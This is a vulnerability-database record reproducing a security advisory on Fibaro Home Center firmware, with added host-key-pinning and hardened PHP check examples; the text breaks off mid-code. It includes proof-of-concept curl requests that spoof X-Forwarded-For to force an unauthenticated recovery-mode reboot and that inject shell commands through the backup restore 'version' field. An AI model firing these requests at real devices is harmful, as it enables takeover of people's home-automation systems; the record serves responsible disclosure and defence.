\n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. 
\n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. 
\n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. 
\n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. 
\n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. 
\n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20991",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "id": "VAR-202104-0489",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.403000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "FIBARO Home Center 2 Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148429"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "date": "2021-04-19T14:15:11.787000",
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "date": "2022-04-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "date": "2024-11-21T05:47:20.827000",
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Command injection vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0468

    Vulnerability from variot - Updated: 2024-11-23 22:05

    In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities 
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
                        https://www.fibaro.com/
    vulnerable version: 4.600 and older
         fixed version: 4.610
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 
                        CVE-2021-20992
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
                        9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
              reported: 2020-11-18
           publication: 2021-04-08
                    by: Marton Illes, IoT Inspector Research Lab
                        https://www.iot-inspector.com/
    
    Vendor description:
    -------------------
    "FIBARO is a global brand based on the Internet of Things technology. It 
    provides solutions for building and home automation. FIBARO's headquarters
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    employs app. 250 employees."
    
    https://www.fibaro.com/en/about-us/
    
    Vulnerability overview/description:
    -----------------------------------
    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)
    Home Center devices initiate SSH connections to the Fibaro cloud to provide 
    remote access and remote support capabilities. This connection can be 
    intercepted using a man-in-the-middle attack and a device initiated remote 
    port-forward channel can be used to connect to the web management interface. 
    IoT Inspector identified a disabled SSH host key check, which enables 
    man-in-the-middle attacks. 
    
    By intercepting connections to the Fibaro cloud, an attacker can eavesdrop on 
    communication between the user and the device. As communication inside the 
    SSH port-forward is not encrypted (see #4 on management interface), user 
    sessions, tokens and passwords can be hijacked. 
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode 
    (CVE-2021-20990)
    An internal management service is accessible on port 8000 and some API 
    endpoints could be accessed without authentication to trigger a shutdown, a 
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can 
    upload firmware without authentication. (Potentially an earlier version with
    known remote command execution vulnerability, see #3)
    
    3) Authenticated remote command execution (versions before 4.550) 
    (CVE-2021-20991)
    An authenticated user can run commands as root user using a command injection 
    vulnerability. 
    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky 
    ICS Cert: https://securelist.com/fibaro-smart-home/91416/
    
    4) Unencrypted management interface (CVE-2021-20992)
    Home Center devices provide a web based management interface over unencrypted 
    HTTP protocol. Communication between the user and the device can be 
    eavesdropped to hijack sessions, tokens, and passwords. The management 
    interface is only available over HTTP on the local network. The vendor 
    recommends using the cloud-based management interface, which is accessible over 
    HTTPS and requests are forwarded via an encrypted SSH connection between the 
    Fibaro cloud and the device. 
    
    
    
    
    
    
    Proof of concept:
    -----------------
    1) Cloud SSH Connection Man-in-the-Middle Attack
    
    Home Center devices initiate an SSH connection to the Fibaro cloud:
    
    ./etc/init.d/fibaro/RemoteAccess
    <snip>
    DAEMON=/usr/bin/ssh
    .... 
    case "$1" in
      start)
                    ..... 
        # get IP
        local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
        # get PORT
        local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
                    .... 
        start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"
    </snip>
    
    The device uses dropbear ssh to initiate the connection; option -y disables any 
    host-key checks, voiding much of the otherwise added transport-layer security 
    by SSH: "Always accept hostkeys if they are unknown."
    
    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 
    lb-1.eu.ra.fibaro.com
    
    An attacker can use DNS spoofing or other means to intercept the connection. By 
    using any hostkey, the attacker can successfully authenticate the SSH 
    connection. Once the connection is authenticated, the client initiates a remote 
    port-forward:
    -R "${PORT_Response}":localhost:80
    
    This enables the attacker to access port 80 (management interface) of the 
    device. 
    
    
    
    
    A similar problem exists for remote support connections:
    
    ./opt/fibaro/scripts/remote-support.lua
    <snip>
    function handleResponse(response)
      responseJson = json.decode(response.data)
      print(json.encode(responseJson))
    
      local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip .. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
      os.execute(autoSSHCommand)
    end
    
    function getSupportData()
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey
      print(remoteUrl)
    
      http = net.HTTPClient({timeout = 5000})
    
      http:request(remoteUrl, {
        options = {
          method = 'GET'
        },
        success = function(response)
          handleResponse(response)
        end,
        error = function(error)
          print(error)
        end
      })
    end
    
    getSupportData()
    </snip>
    
    Here, the remote support endpoint returns the following data:
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY.ZZZ"}
    
    The same dropbear ssh client is used with option -y. In this case, port 22 
    (ssh) is made accessible through the port-forward. However, the device only 
    allows public key authentication with a hard-coded SSH key. No further testing 
    has been done on compromising the support SSH connection. 
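What the -y option gives up, as an added example that is not part of the advisory or Fibaro's code: a client that keeps a known_hosts entry for the cloud host can classify a presented server key as MATCH, MISMATCH or UNKNOWN, and -y tells dropbear to accept UNKNOWN. The key blobs are constructed random data, the host name is the one the advisory quotes, and the assumption that the device ships no pinned entry for it is the editor's.

```python
"""Host-key pinning versus dropbear's -y (accept unknown host keys).

Constructed demonstration: a minimal known_hosts parser, the three possible
verdicts for a presented key, and the acceptance policy with and without -y.
"""
import base64
import hashlib
import os


def fingerprint_sha256(key_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64-encoded key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_known_hosts(text: str) -> dict:
    """Map (host, keytype) -> key blob for 'host[,host...] keytype base64 [comment]' lines."""
    pinned = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 3:
            continue
        for host in fields[0].split(","):
            pinned[(host, fields[1])] = fields[2]
    return pinned


def check_host_key(host: str, keytype: str, presented_b64: str, pinned: dict) -> str:
    """Verdict for the key the server presented during the SSH handshake."""
    stored = pinned.get((host, keytype))
    if stored is None:
        return "UNKNOWN"
    return "MATCH" if stored == presented_b64 else "MISMATCH"


def client_accepts(verdict: str, accept_unknown: bool) -> bool:
    """accept_unknown=True models dropbear -y: unknown keys pass, mismatches still fail."""
    return verdict == "MATCH" or (accept_unknown and verdict == "UNKNOWN")


CLOUD_HOST = "lb-1.eu.ra.fibaro.com"                      # host name from the advisory
GENUINE_KEY = base64.b64encode(os.urandom(64)).decode()   # constructed, not a real key
MITM_KEY = base64.b64encode(os.urandom(64)).decode()      # constructed, not a real key
PINNED_KNOWN_HOSTS = f"{CLOUD_HOST} ssh-rsa {GENUINE_KEY} fibaro-cloud\n"


def mitm_outcomes() -> dict:
    """Does the client accept an interceptor's key in each configuration?"""
    no_pin = parse_known_hosts("")               # device as shipped (assumed: no entry)
    pinned = parse_known_hosts(PINNED_KNOWN_HOSTS)
    return {
        "no_pin_with_-y": client_accepts(check_host_key(CLOUD_HOST, "ssh-rsa", MITM_KEY, no_pin), True),
        "no_pin_strict": client_accepts(check_host_key(CLOUD_HOST, "ssh-rsa", MITM_KEY, no_pin), False),
        "pinned_with_-y": client_accepts(check_host_key(CLOUD_HOST, "ssh-rsa", MITM_KEY, pinned), True),
        "pinned_genuine": client_accepts(check_host_key(CLOUD_HOST, "ssh-rsa", GENUINE_KEY, pinned), True),
    }


if __name__ == "__main__":
    print("genuine cloud key:", fingerprint_sha256(GENUINE_KEY))
    for config, accepted in mitm_outcomes().items():
        print(f"{config}: interceptor key accepted = {accepted}")
```

With no pinned entry every key is UNKNOWN, so -y accepts the interceptor; a shipped known_hosts entry turns the same key into a MISMATCH, which -y does not override.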
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    The device is running an nginx server, which forwards some requests to a 
    lighttpd server (8000) for further processing:
    <snip>
                                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    
            location ~* \.php$ {
                proxy_pass   http://127.0.0.1:8000;
            }
    
            location ~* \.php\?.* {
                proxy_pass   http://127.0.0.1:8000;
            }
    </snip>
    
    The lighttpd server is not only accessible locally, but also via the local 
    network. 
    
    Authentication and authorization are implemented in PHP and there is a special 
    check for connections originating from within the host. However, when checking 
    the remote IP address, the header X-Forwarded-For is also considered:
    
    ./var/www/authorize.php
    <snip>
    function isLocalRequest()
    {
        $ipAddress = "";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
        else
            $ipAddress = $_SERVER['REMOTE_ADDR'];
    
        $whitelist = array( '127.0.0.1', '::1' );
        if(in_array($ipAddress, $whitelist))
            return true;
    
        return false;
    }
    </snip>
    
    As the lighttpd service is available via the network, an attacker can inject the 
    required header X-Forwarded-For as well. 
    
    
    
    
    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    
    <snip>
    
    <?php
    
        require_once("../../authorize.php");
    
    
    
        if (!isLocalRequest() && !isAuthorized())
    
        {
    
           sendUnauthorized();
    
        }
    
        else
    
        {
    
            exec("systemShutdown");
    
        }
    
    ?>
    
    </snip>
    
    
    
    ./var/www/services/system/reboot.php
    
    <snip>
    
    
    
    function authorize() 
    
    {
    
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
    role::INSTALLER));
    
    }
    
    
    
    function handlePOST($text)
    
    {
    
        if (!isLocalRequest() && !authorize())
    
        {
    
           sendUnauthorized();
    
           return;
    
        }
    
    
    
        $params = tryDecodeJson($text);
    
        if(!is_null($params) && isset($params->recovery) && $params->recovery
    === true)
    
            exec("rebootToRecovery");
    
        else
    
            exec("systemReboot");
    
    }
    
    
    
    $requestBody = file_get_contents('php://input');
    
    $requestMethod = $_SERVER['REQUEST_METHOD'];
    
    
    
    if ($requestMethod == "POST") 
    
        handlePOST($requestBody);
    
    else 
    
        setStatusMethodNotAllowed();
    
    
    
    </snip>
    
    
    
    An attacker can issue the the following HTTP request to reboot the device
    into 
    
    recovery mode:
    
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
    '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php
    
    
    
    In recovery mode, firmware images can be updated without authentication. 
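    A hardened replacement for the isLocalRequest() check, added here as an example and not code from Fibaro's firmware. It consults X-Forwarded-For only when the TCP peer is the local nginx proxy, and then reads the last address in the header, the one nginx's $proxy_add_x_forwarded_for appended; the $_SERVER arrays at the bottom are constructed test inputs.

```php
<?php
// Added example, not Fibaro's code: a hardened replacement for the
// isLocalRequest() check shown above. Assumed deployment (as in the advisory):
// nginx on the device proxies *.php to lighttpd with
//   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
// That directive APPENDS the real peer address to whatever the client sent,
// so only the last element of the header was written by nginx. Binding
// lighttpd to 127.0.0.1 instead of exposing port 8000 on the LAN is the
// complementary fix; the check below does not rely on it.

const LOCAL_ADDRESSES = ['127.0.0.1', '::1'];

/**
 * Decide whether a request really originates on the device itself.
 * $server is the $_SERVER array, passed in so the function can be exercised
 * with constructed requests.
 */
function isLocalRequestHardened(array $server): bool
{
    $peer = $server['REMOTE_ADDR'] ?? '';

    // 1) The TCP peer must itself be local. A LAN host talking to lighttpd
    //    directly on port 8000 fails here whatever headers it sends; the
    //    original check let a client-supplied header override this.
    if (!in_array($peer, LOCAL_ADDRESSES, true)) {
        return false;
    }

    // 2) The peer is local, but it may be nginx forwarding for someone else.
    //    Without the header it is a direct local caller (e.g. a script on
    //    the device); with it, only the last hop is trustworthy.
    $xff = trim($server['HTTP_X_FORWARDED_FOR'] ?? '');
    if ($xff === '') {
        return true;
    }
    $hops = array_map('trim', explode(',', $xff));
    $client = end($hops);
    return in_array($client, LOCAL_ADDRESSES, true);
}

// Constructed requests (not captured from a device) exercising the check;
// each entry is [$_SERVER subset, expected result].
$cases = [
    // direct local caller, no proxy in between
    [['REMOTE_ADDR' => '127.0.0.1'], true],
    // LAN client through nginx: nginx supplied the header
    [['REMOTE_ADDR' => '127.0.0.1',
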